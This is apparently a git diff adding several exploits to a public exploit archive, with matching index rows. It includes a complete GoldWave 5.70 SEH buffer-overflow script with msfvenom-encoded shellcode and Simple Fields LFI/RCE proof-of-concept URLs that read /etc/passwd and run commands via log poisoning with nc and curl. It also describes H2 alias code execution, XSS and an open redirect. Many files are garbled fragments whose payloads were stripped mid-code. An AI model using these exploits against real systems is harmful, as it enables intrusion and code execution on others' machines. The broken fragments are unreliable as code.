diff --git a/exploits/java/local/44422.py b/exploits/java/local/44422.py new file mode 100755 index 000000000..7deae07b5 --- /dev/null +++ b/exploits/java/local/44422.py @@ -0,0 +1,92 @@ +''' +Exploit Title: H2 Database Alias Abuse +Date: 05/04/2018 +Exploit Author: gambler +Vendor Homepage:www.h2database.com +Software Link: http://www.h2database.com/html/download.html +Version: all versions +Tested on: Linux, Mac OS +''' + +import sys +import argparse +import html +import requests + +# Blogpost about it +# https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html + +def getCookie(host): + url = 'http://{}'.format(host) + r = requests.get(url) + path = r.text.split('href = ')[1].split(';')[0].replace("'","").replace('.jsp','.do') + return '{}/{}'.format(url,path) + +def login(url,user,passwd,database): + data = {'language':'en','setting':'Generic+H2+(Embedded)','name':'Generic+H2+(Embedded)','driver':'org.h2.Driver','url':database,'user':user,'password':passwd} + r = requests.post(url,data=data) + if '
">
+- Navigate to the index to see a board wide persistent XSS alert.
\ No newline at end of file
diff --git a/exploits/php/webapps/44421.txt b/exploits/php/webapps/44421.txt
new file mode 100644
index 000000000..3767ef6b1
--- /dev/null
+++ b/exploits/php/webapps/44421.txt
@@ -0,0 +1,42 @@
+#######################################
+# Exploit Title: WolfCMS 0.8.3.1 Open Redirection Vulnerability
+# Google Dork: N/A
+# Date: 04-04-2018
+#######################################
+# Exploit Author: Sureshbabu Narvaneni#
+#######################################
+# Author Blog : http://nullnews.in
+# Vendor Homepage: http://www.wolfcms.org
+# Software Link: https://bitbucket.org/wolfcms/wolf-cms-downloads/downloads/wolfcms-0.8.3.1.zip
+# Affected Version: 0.8.3.1
+# Category: WebApps
+# Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686
+# CVE : CVE-2018-8813
+#
+# 1. Vendor Description:
+#
+# Light-weight, fast, simple and powerful CMS. PHP-based, easily extended CMS. Uses MySQL, SQLite or (from 0.7)
+# PostgreSQL for db. Simple drag & drop page hierarchy. Open source, licensed under GPLv3.
+#
+# 2. Technical Description:
+#
+# Open redirect vulnerability in the login[redirect] parameter login
+functionality in WolfCMS before 0.8.3.1 allows
+# remote attackers to redirect users to arbitrary web sites and conduct
+phishing attacks via a malformed URL.
+#
+# 3. Proof Of Concept:
+#
+# Navigate to http://[URL]/wolfcms/?/admin/login
+# Enter the credentials and replace login[redirect] to any url.
+# You can see the unvalidated redirect.
+#
+# 4. Solution:
+#
+# Upgrade to latest release.
+# http://www.wolfcms.org/blog.html
+#
+# 5. Reference:
+# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8813
+# https://github.com/wolfcms/wolfcms/issues/670
+#####################################
\ No newline at end of file
diff --git a/exploits/php/webapps/44424.txt b/exploits/php/webapps/44424.txt
new file mode 100644
index 000000000..3216d8843
--- /dev/null
+++ b/exploits/php/webapps/44424.txt
@@ -0,0 +1,66 @@
+# Exploit title: Yahei-PHP Proberv0.4.7 - Cross-Site Scripting
+# Google Dork: intitle:"Proberv0." | inurl:/proberv.php
+# Date: 23/03/2018
+# Exploit Author: ManhNho
+# Vendor Homepage: http://www.yahei.net/
+# Software Link: www.yahei.net/tz/tz_e.zip
+# Version: 0.4.7
+# CVE: CVE-2018-9238
+# Tested on: Windows 10 / Kali Linux
+# Category: Webapps
+
+
+#1. Description
+-----------------------------------------------------
+proberv.php in Yahei-PHP Proberv 0.4.7 has XSS via the funName parameter.
+
+
+#2. Proof of Concept
+-----------------------------------------------------
+Request:
+
+POST /proberv.php HTTP/1.1
+Host:
+
+Test results
+support the position: 错误')
+
+
+#3. References
+-----------------------------------------------------
+https://pastebin.com/ia7U4vi9
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9238
\ No newline at end of file
diff --git a/exploits/php/webapps/44425.txt b/exploits/php/webapps/44425.txt
new file mode 100644
index 000000000..87456ce8a
--- /dev/null
+++ b/exploits/php/webapps/44425.txt
@@ -0,0 +1,42 @@
+# Exploit Title: Simple Fields 0.2 - 0.3.5 LFI/RFI/RCE
+# Date: 2018-04-08
+# Exploit Author: Graeme Robinson
+# Contact: @Grasec
+# Vendor Homepage: http://simple-fields.com
+# Software Link: https://downloads.wordpress.org/plugin/simple-fields.0.3.5.zip
+# Version: 0.2 - 0.3.5
+# Tested on: Ubuntu 16.04.4 + PHP 5.3.0
+# Category: webapps
+
+
+1. Description
+Versions 0.2 to 0.3.5 of the Simple Fields WordPress plugin are vulnerable to local file inclusion if running on PHP <5.3.4. This can even lead to remote code execution, for example by injecting php code into the apache logs or if allow_url_include is turned on in php.ini.
+
+PHP <5.3.4 is required because the exploit relies on the ability to inject a null byte to terminate a string before the script expects it to be and this was fixed in PHP 5.3.4
+
+The vulnerability was fixed (commented out) in version 0.3.6 on 2011-02-03. Simple Fields is no longer actively developed, since 2016-02-27 (http://simple-fields.com/2016/bye-bye-simple-fields/)
+
+The vulnerable line of code in simple_fields.php is:
+ require( $_GET["wp_abspath"] . './wp-blog-header.php' );
+
+
+2. Proof of concept
+LFI:
+ http://host/wordpress/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00
+
+RCE:
+ $ echo ""|nc host 80
+ $ curl "http://host/wordpress/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=../../../../../logs/access_log%00&cmd=id"
+
+
+3. Solutions:
+* Upgrade PHP to 5.3.4+
+* Update Simple Fields to 0.3.6+
+* Stop using Simple Fields because it is no longer supported
+
+
+4. Relevant Links:
+* http://simple-fields.com
+* https://wordpress.org/plugins/simple-fields/
+* https://downloads.wordpress.org/plugin/simple-fields.0.3.5.zip
+* https://github.com/bonny/WordPress-Simple-Fields
\ No newline at end of file
diff --git a/exploits/php/webapps/44432.txt b/exploits/php/webapps/44432.txt
new file mode 100644
index 000000000..9cb06725e
--- /dev/null
+++ b/exploits/php/webapps/44432.txt
@@ -0,0 +1,47 @@
+# Exploit Title: Plugin Buddypress Xprofile Custom Fields Type 2.6.3 RCE – Unlink
+# Date: 08/04/2018
+# Exploit Author: Lenon Leite
+# Vendor Homepage:
+# https://wordpress.org/plugins/buddypress-xprofile-custom-fields-type/
+# Software Link:
+# https://wordpress.org/plugins/buddypress-xprofile-custom-fields-type/
+# Contact: http://twitter.com/lenonleite
+# Website: http://lenonleite.com.br/
+# Category: webapps
+# Version: 2.6.3
+# Tested on: Ubuntu 16.1
+#
+#Article:
+#http://lenonleite.com.br/publish-exploits/plugin-buddypress-xprofile-custom-fields-type-2-6-3-rce-unlink/
+#
+#Video:
+#https://www.youtube.com/watch?v=By7kT7UbHVk
+#
+
+1 - Description
+ - Type user access: any user registered used in BuddyPress.
+ - $_POST[ 'field_' . $field_id . '_hiddenfile' ] is not escaped.
+ - $_POST[ 'field_' . $field_id . '_deleteimg' ] is not escaped.
+
+
+2. Proof of Concept
+
+Login as regular user.
+
+1- Log in with BuddyPress User
+
+2 - Access Edit Profile:
+
+http://target/members/admin/profile/edit/
+
+3 - Register data with image:
+
+
+
+Enter the function you want to test:
+
+
+
+
+
+
+
+...
+
+3. References
+====================
+https://pastebin.com/caQW37fY
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-9235
\ No newline at end of file
diff --git a/exploits/php/webapps/44435.txt b/exploits/php/webapps/44435.txt
new file mode 100644
index 000000000..e0040a5cb
--- /dev/null
+++ b/exploits/php/webapps/44435.txt
@@ -0,0 +1,34 @@
+# Exploit Title: Plugin Google Drive for WordPress 2.2 – RCE – Unlik
+# Date: 08/04/2018
+# Exploit Author: Lenon Leite
+# Vendor Homepage: *https://wordpress.org/plugins/wp-google-drive/
+# Software Link: *https://wordpress.org/plugins/wp-google-drive/
+# Contact: http://twitter.com/lenonleite
+# Website: http://lenonleite.com.br/
+# Category: webapps
+# Version: 2.2
+# Tested on: Ubuntu 16.1
+
+1 - Description
+
+
+ - Type user access: Don't need of login .
+ - $_POST[‘file_name’] is not escaped.
+
+2. Proof of Concept
+
+1 - Send data form:
+
+
+
+
+# - Date Discovery : *11/25/2017*
+# - Date Vendor Contact : *12/26/2017*
+# - Date Publish : 08/04/2018
+# - Date Resolution :
\ No newline at end of file
diff --git a/exploits/windows/local/44423.py b/exploits/windows/local/44423.py
new file mode 100755
index 000000000..38950e686
--- /dev/null
+++ b/exploits/windows/local/44423.py
@@ -0,0 +1,68 @@
+#!/usr/bin/python
+
+#
+# Exploit Author: bzyo
+# Twitter: @bzyo_
+# Exploit Title: GoldWave 5.70 - Local Buffer Overflow (SEH Unicode)
+# Date: 04-05-2018
+# Vulnerable Software: GoldWave 5.70
+# Vendor Homepage: https://www.goldwave.com/
+# Version: 5.70
+# Software Link: http://goldwave.com//downloads/gwave570.exe
+# Tested Windows 7 SP1 x86
+#
+#
+# PoC
+# 1. generate goldwave570.txt, copy contents to clipboard
+# 2. open gold wave app
+# 3. select File, Open URL...
+# 4. paste contents from clipboard after 'http://'
+# 5. select OK
+# 6. pop calc
+#
+
+filename="goldwave570.txt"
+
+junk = "\x71"*1019
+
+#popad
+nseh = "\x61\x62"
+
+#0x006d000f : pop ecx # pop ebp # ret | startnull,unicode,ascii {PAGE_EXECUTE_READ} [GoldWave.exe]
+seh = "\x0f\x6d"
+
+valign = (
+"\x53" #push ebx
+"\x47" #align
+"\x58" #pop eax
+"\x47" #align
+"\x05\x16\x11" #add eax,600
+"\x47" #align
+"\x2d\x13\x11" #sub eax,300
+"\x47" #align
+"\x50" #push eax
+"\x47" #align
+"\xc3" #retn
+)
+
+#nops to shellcode
+nops = "\x71" * 365
+
+#msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_upper BufferRegister=EAX
+#Payload size: 517 bytes
+calc = (
+"PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AA"
+"PAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLIXTBKPM0M0S0DIK501I0C44"
+"K0PP0DKPRLLTKQBMDTKBRO8LOFWOZMV01KOFLOLS13LLBNLO0WQXOLMKQI7K2KB0RQGTKPRN0DK0J"
+"OL4K0LN1CHISOXKQXQ214K0YMPKQJ3DK0IN8K3NZOYTKNT4KM1YFNQKO6L91XOLMM1WW08IP45ZVK"
+"S3MZXOKSMMTRUK4B8TKPXO4M1YCBFDKLLPKDKR8MLM1YC4KKTTKM18PU9PDO4MT1K1KQQR91J0QKO"
+"IP1O1O1J4KN2ZK4MQMRJM14MSUVRM0M0M0PP2HNQTKROSWKO8UWKZPH55R1FQX6FF5WMEMKOXUOLL"
+"F3LKZE0KKYPRUM5GKOWMCCBRO2JM023KOYE1S1QRLBCNNRERX1UM0AA")
+
+fill = "\x71"* 5000
+
+buffer = junk + nseh + seh + valign + nops + calc + fill
+
+textfile = open(filename , 'w')
+textfile.write(buffer)
+textfile.close()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 8d3edd7a2..b15603e15 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5923,6 +5923,8 @@ id,file,description,date,author,type,platform,port
44397,exploits/windows/dos/44397.js,"Microsoft Edge Chakra JIT - Stack-to-Heap Copy (Incomplete Fix) (2)",2018-04-03,"Google Security Research",dos,windows,
44402,exploits/windows/dos/44402.txt,"Microsoft Windows Defender - 'mpengine.dll' Memory Corruption",2018-04-05,"Google Security Research",dos,windows,
44404,exploits/windows/dos/44404.html,"Microsoft Windows - Multiple Use-After-Free Issues in jscript Array Methods",2018-04-05,"Google Security Research",dos,windows,
+44427,exploits/multiple/dos/44427.txt,"WebKit - WebAssembly Parsing Does not Correctly Check Section Order",2018-04-09,"Google Security Research",dos,multiple,
+44428,exploits/linux/dos/44428.txt,"CyberArk Password Vault < 9.7 / < 10 - Memory Disclosure",2018-04-09,"RedTeam Pentesting",dos,linux,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9635,6 +9637,9 @@ id,file,description,date,author,type,platform,port
44389,exploits/windows/local/44389.txt,"WebLog Expert Enterprise 9.4 - Privilege Escalation",2018-04-02,bzyo,local,windows,
44410,exploits/windows/local/44410.txt,"Sophos Endpoint Protection 10.7 - Tamper-Protection Bypass",2018-04-06,hyp3rlinx,local,windows,
44411,exploits/windows/local/44411.txt,"Sophos Endpoint Protection Control Panel 10.7 - Weak Password Encryption",2018-04-06,hyp3rlinx,local,windows,
+44422,exploits/java/local/44422.py,"H2 Database - 'Alias' Arbitrary Code Execution",2018-04-09,gambler,local,java,
+44423,exploits/windows/local/44423.py,"GoldWave 5.70 - Local Buffer Overflow (SEH Unicode)",2018-04-09,bzyo,local,windows,
+44426,exploits/linux/local/44426.py,"PMS 0.42 - Local Stack-Based Overflow (ROP)",2018-04-09,"Juan Sacco",local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16374,6 +16379,7 @@ id,file,description,date,author,type,platform,port
44292,exploits/windows/remote/44292.py,"SAP NetWeaver AS JAVA CRM - Log injection Remote Command Execution",2018-03-14,"erp scan team",remote,windows,
44293,exploits/windows/remote/44293.html,"Firefox 46.0.1 - ASM.JS JIT-Spray Remote Code Execution",2018-03-16,Rh0,remote,windows,
44294,exploits/windows/remote/44294.html,"Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution",2018-03-16,Rh0,remote,windows,
+44297,exploits/linux/remote/44297.py,"Unitrends UEB 10.0 - Unauthenticated Root Remote Code Execution",2018-03-16,"Jared Arave",remote,linux,
44345,exploits/windows/remote/44345.txt,"Acrolinx Server < 5.2.5 - Directory Traversal",2018-03-26,"Berk Dusunur",remote,windows,
44349,exploits/linux/remote/44349.md,"TestLink Open Source Test Management < 1.9.16 - Remote Code Execution (PoC)",2018-03-27,"Manish Tanwar",remote,linux,
44356,exploits/windows/remote/44356.rb,"GitStack - Unsanitized Argument Remote Code Execution (Metasploit)",2018-03-29,Metasploit,remote,windows,
@@ -39113,3 +39119,16 @@ id,file,description,date,author,type,platform,port
44413,exploits/hardware/webapps/44413.txt,"FiberHome VDSL2 Modem HG 150-UB - Authentication Bypass",2018-04-06,"Noman Riffat",webapps,hardware,
44414,exploits/windows/webapps/44414.txt,"DotNetNuke DNNarticle Module 11 - Directory Traversal",2018-04-06,"Esmaeil Rahimian",webapps,windows,
44416,exploits/php/webapps/44416.txt,"Cobub Razor 0.7.2 - Cross Site Request Forgery",2018-04-06,ppb,webapps,php,
+44418,exploits/php/webapps/44418.txt,"WolfCMS 0.8.3.1 - Cross Site Request Forgery",2018-04-09,"Sureshbabu Narvaneni",webapps,php,
+44419,exploits/php/webapps/44419.txt,"Cobub Razor 0.7.2 - Add New Superuser Account",2018-04-09,ppb,webapps,php,
+44420,exploits/php/webapps/44420.txt,"MyBB Plugin Recent Threads On Index - Cross-Site Scripting",2018-04-09,Perileos,webapps,php,
+44421,exploits/php/webapps/44421.txt,"WolfCMS 0.8.3.1 - Open Redirection",2018-04-09,"Sureshbabu Narvaneni",webapps,php,80
+44424,exploits/php/webapps/44424.txt,"Yahei PHP Prober 0.4.7 - Cross-Site Scripting",2018-04-09,ManhNho,webapps,php,
+44425,exploits/php/webapps/44425.txt,"WordPress Plugin Simple Fields 0.2 - 0.3.5 - Local/Remote File Inclusion / Remote Code Execution",2018-04-09,"Graeme Robinson",webapps,php,80
+44429,exploits/json/webapps/44429.txt,"CyberArk Password Vault Web Access < 9.9.5 / < 9.10 / 10.1 - Remote Code Execution",2018-04-09,"RedTeam Pentesting",webapps,json,
+44430,exploits/linux/webapps/44430.txt,"KYOCERA Multi-Set Template Editor 3.4 - Out-Of-Band XML External Entity Injection",2018-04-09,LiquidWorm,webapps,linux,
+44431,exploits/linux/webapps/44431.txt,"KYOCERA Net Admin 3.4 - Cross Site Request Forgery - Add Admin Exploit",2018-04-09,LiquidWorm,webapps,linux,
+44432,exploits/php/webapps/44432.txt,"Buddypress Xprofile Custom Fields Type 2.6.3 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php,
+44433,exploits/php/webapps/44433.txt,"WooCommerce CSV-Importer-Plugin 3.3.6 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php,
+44434,exploits/php/webapps/44434.txt,"iScripts SonicBB 1.0 - Reflected Cross-Site Scripting",2018-04-09,ManhNho,webapps,php,
+44435,exploits/php/webapps/44435.txt,"WordPress Plugin Google Drive 2.2 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php,
iScripts Forum ->
+">Search
+
+
+
+